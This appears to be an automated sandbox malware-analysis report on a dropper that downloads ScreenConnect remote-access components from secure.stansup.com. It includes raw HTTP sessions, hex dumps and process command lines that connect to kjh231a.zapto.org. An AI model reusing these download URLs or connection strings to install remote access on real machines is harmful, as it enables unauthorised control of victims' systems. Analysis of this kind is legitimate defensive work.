| Oct 25, 2024 19:29:21.693439960 CEST | 1.1.1.1 | 192.168.2.5 | 0x39ca | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Oct 25, 2024 19:29:21.693439960 CEST | 1.1.1.1 | 192.168.2.5 | 0x39ca | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:50.958736897 CEST | 1.1.1.1 | 192.168.2.5 | 0x3492 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:50.958736897 CEST | 1.1.1.1 | 192.168.2.5 | 0x3492 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:54.229527950 CEST | 1.1.1.1 | 192.168.2.5 | 0xc368 | No error (0) | kjh231a.zapto.org | | 79.110.49.185 | A (IP address) | IN (0x0001) | false |

• secure.stansup.com

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49705 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe |

Timestamp: 2024-10-25 17:29:18 UTC, Bytes transferred: 628, Direction: OUT, Data:
GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive

Timestamp: 2024-10-25 17:29:18 UTC, Bytes transferred: 250, Direction: IN, Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 118229
Content-Type: application/x-ms-application; charset=utf-8
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:29:18 GMT
Connection: close


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49711 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe |

Timestamp: 2024-10-25 17:29:21 UTC, Bytes transferred: 100, Direction: OUT, Data:
GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip

Timestamp: 2024-10-25 17:29:21 UTC, Bytes transferred: 215, Direction: IN, Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17858
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:29:21 GMT
Connection: close
2024-10-25 17:29:21 UTC | 16169 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49722 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:29:27 UTC | 102 | OUT | GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:29:27 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 95520
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:29:27 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49723 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:29:29 UTC | 134 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:29:29 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61216
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:29:29 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49725 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:29:31 UTC | 138 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:29:31 UTC | 213 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:29:31 GMT
Connection: close
2024-10-25 17:29:31 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49727 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:29:32 UTC | 133 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:29:32 UTC | 213 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:29:32 GMT
Connection: close
2024-10-25 17:29:32 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49730 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:29:33 UTC | 117 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:29:33 UTC | 213 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:29:33 GMT
Connection: close
2024-10-25 17:29:33 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49732 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:29:34 UTC | 131 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:29:35 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81696
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:29:34 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49735 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:29:36 UTC | 119 | OUT | GET /Bin/ScreenConnect.Client.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:29:36 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197120
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:29:36 GMT
Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:37 UTC16384INData Raw: 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00 75
                                                                                                                                                                                                                                                      Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVolu
                                                                                                                                                                                                                                                      2024-10-25 17:29:37 UTC16384INData Raw: 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06 01
                                                                                                                                                                                                                                                      Data Ascii: tMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49753 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:29:38 UTC | 96 | OUT | GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:29:39 UTC | 217 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1721856
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:29:38 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49780 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:29:44 UTC | 102 | OUT | GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:29:45 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68096
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:29:45 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49791 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:29:46 UTC | 93 | OUT | GET /Bin/ScreenConnect.Core.dll HTTP/1.1
    Host: secure.stansup.com
    Accept-Encoding: gzip
2024-10-25 17:29:46 UTC | 216 | IN | HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 548352
    Content-Type: text/html
    Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
    Date: Fri, 25 Oct 2024 17:29:46 GMT
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49803 | 79.110.49.185 | 443 | 3056 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:29:48 UTC | 102 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
    Host: secure.stansup.com
    Accept-Encoding: gzip
2024-10-25 17:29:49 UTC | 216 | IN | HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 600864
    Content-Type: text/html
    Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
    Date: Fri, 25 Oct 2024 17:29:48 GMT
    Connection: close
                                                                                                                                                                                                                                                      Data Ascii: _*>s%}5*0Y?s}{(+-*(s(+~%-&~sv%("+*0E@s}s(+~%-&~s%(+*0.A~r@pe(#o
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC16384INData Raw: 87 02 00 04 02 28 46 00 00 0a 2a 1e 02 7b 84 02 00 04 2a 1e 02 7b 85 02 00 04 2a 1e 02 7b 86 02 00 04 2a 1e 02 7b 87 02 00 04 2a 32 02 7b 82 02 00 04 6f 7e 06 00 0a 2a 36 02 7b 83 02 00 04 03 6f 18 0b 00 0a 2a 1e 02 7b 94 02 00 04 2a 22 02 03 7d 94 02 00 04 2a e6 02 28 d7 00 00 0a 02 20 06 20 00 00 17 28 32 04 00 0a 02 16 28 a2 00 00 0a 02 17 6f fb 01 00 0a 02 17 28 19 0b 00 0a 02 28 1a 0b 00 0a 02 28 ba 01 00 0a 28 f8 01 00 0a 2a 76 02 28 29 08 00 0a 25 20 00 00 00 80 6f eb 04 00 0a 25 20 88 00 00 00 6f ec 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 90 01 00 11 0f 01 28 ef 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f2 01 00 0a 28 1b 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f2 01 00 0a 28 86 00 00 0a 73 41 05 00 0a 2a 02 02 28 f0 01 00 0a 02 28 ec 01 00 0a 02 28
                                                                                                                                                                                                                                                      Data Ascii: (F*{*{*{*{*2{o~*6{o*{*"}*( (2(o((((*v()% o% o*0(,+((((,((sA*(((



                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:13:29:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\3coxOaV92n.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\3coxOaV92n.exe"
                                                                                                                                                                                                                                                      Imagebase:0xac0000
                                                                                                                                                                                                                                                      File size:83'360 bytes
                                                                                                                                                                                                                                                      MD5 hash:8BAAA006991B70783ED369D3CA853CA3
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                      Start time:13:29:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                      Imagebase:0x2a171bc0000
                                                                                                                                                                                                                                                      File size:24'856 bytes
                                                                                                                                                                                                                                                      MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                      Start time:13:29:14
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                      Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                      Start time:13:29:14
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508
                                                                                                                                                                                                                                                      Imagebase:0xf0000
                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                      Start time:13:29:14
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748
                                                                                                                                                                                                                                                      Imagebase:0xf0000
                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                      Start time:13:29:14
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                      Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                      Start time:13:29:16
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                      Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                      Start time:13:29:50
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                      Imagebase:0xc10000
                                                                                                                                                                                                                                                      File size:600'864 bytes
                                                                                                                                                                                                                                                      MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2421960225.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                      Start time:13:29:51
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                      Imagebase:0xc60000
                                                                                                                                                                                                                                                      File size:95'520 bytes
                                                                                                                                                                                                                                                      MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                      Start time:13:29:51
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                      Imagebase:0xc60000
                                                                                                                                                                                                                                                      File size:95'520 bytes
                                                                                                                                                                                                                                                      MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                      Start time:13:29:52
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "b058094b-2ee9-42ec-a616-548c8b8c83a4" "User"
                                                                                                                                                                                                                                                      Imagebase:0x150000
